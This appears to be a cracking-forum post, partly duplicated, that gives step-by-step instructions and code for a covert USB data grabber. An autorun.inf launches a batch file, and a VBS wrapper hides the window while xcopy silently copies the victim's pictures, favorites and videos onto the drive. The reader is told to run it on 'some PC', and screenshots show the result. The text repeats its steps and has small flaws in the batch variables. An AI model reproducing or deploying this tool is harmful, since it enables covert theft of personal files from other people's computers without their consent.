Like pleb

[ Hidden Content! ]
[1] Make autorun file. In notepad paste this code:
Code:
And Save this as a file as autorun.inf
![[Image: Screenshot-from-2022-11-04-21-54-36.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGUoJHDYSEnt7SjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRRTFYPGxZZBQ--/Screenshot-from-2022-11-04-21-54-36.png)
[2] Make batch file. In notepad paste this code:
Code:
Save as file.bat
![[Image: Screenshot-from-2022-11-04-21-54-21.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGVRaPREuPWV5SjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRRTFcIGxZZBQ--/Screenshot-from-2022-11-04-21-54-21.png)
Copy in the USB and run in some PC!
This is the result:
![[Image: Screenshot-from-2022-11-04-21-55-10.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGWtoNAVWAGdCSjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRQTFQJGxZZBQ--/Screenshot-from-2022-11-04-21-55-10.png)
<--------- Here you can see, the bat file grab also and my desktop wallpaper! ----------- >
![[Image: Screenshot-from-2022-11-04-21-55-46.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGWV9IDAiV2BgSjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRQTFEPGxZZBQ--/Screenshot-from-2022-11-04-21-55-46.png)
[4] Bonus! This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
Code:
Save this as invisible.vbs
[5] Open Notepad one last time and copy-paste the following line.
Code:
save this as launch.bat
Copy all 4 files created in the above steps and put them on the root of the Flash drive Also create a folder.
Code:
Code:
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
And Save this as a file as autorun.inf
![[Image: Screenshot-from-2022-11-04-21-54-36.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGUoJHDYSEnt7SjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRRTFYPGxZZBQ--/Screenshot-from-2022-11-04-21-54-36.png)
[2] Make batch file. In notepad paste this code:
Code:
Code:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures"
"%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites"
"%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos"
"%drive%\all\vids"
@echo off
cls
Save as file.bat
![[Image: Screenshot-from-2022-11-04-21-54-21.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGVRaPREuPWV5SjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRRTFcIGxZZBQ--/Screenshot-from-2022-11-04-21-54-21.png)
Copy in the USB and run in some PC!
This is the result:
![[Image: Screenshot-from-2022-11-04-21-55-10.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGWtoNAVWAGdCSjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRQTFQJGxZZBQ--/Screenshot-from-2022-11-04-21-55-10.png)
<--------- Here you can see, the bat file grab also and my desktop wallpaper! ----------- >
![[Image: Screenshot-from-2022-11-04-21-55-46.png]](https://patched.to/pbb-proxy/UUNCQ0JeTUoBT0UAEwtYWUtUDVlMVVdBHVcUUw1UQwZSUFkdUgsPSg1CHloUWFFBEkcRDRcfUBtDXBJED11RS1pUGWV9IDAiV2BgSjIGS1ADWRFfV0QUU0FcDB1UAARXFAYHHgFQT1dVGgRQTFEPGxZZBQ--/Screenshot-from-2022-11-04-21-55-46.png)
[4] Bonus! This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
Code:
Code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs
[5] Open Notepad one last time and copy-paste the following line.
Code:
Code:
wscript.exe \invisible.vbs file.bat
save this as launch.bat
Copy all 4 files created in the above steps and put them on the root of the Flash drive Also create a folder.
Not ratedThis leak has not been rated yet, be careful when downloading.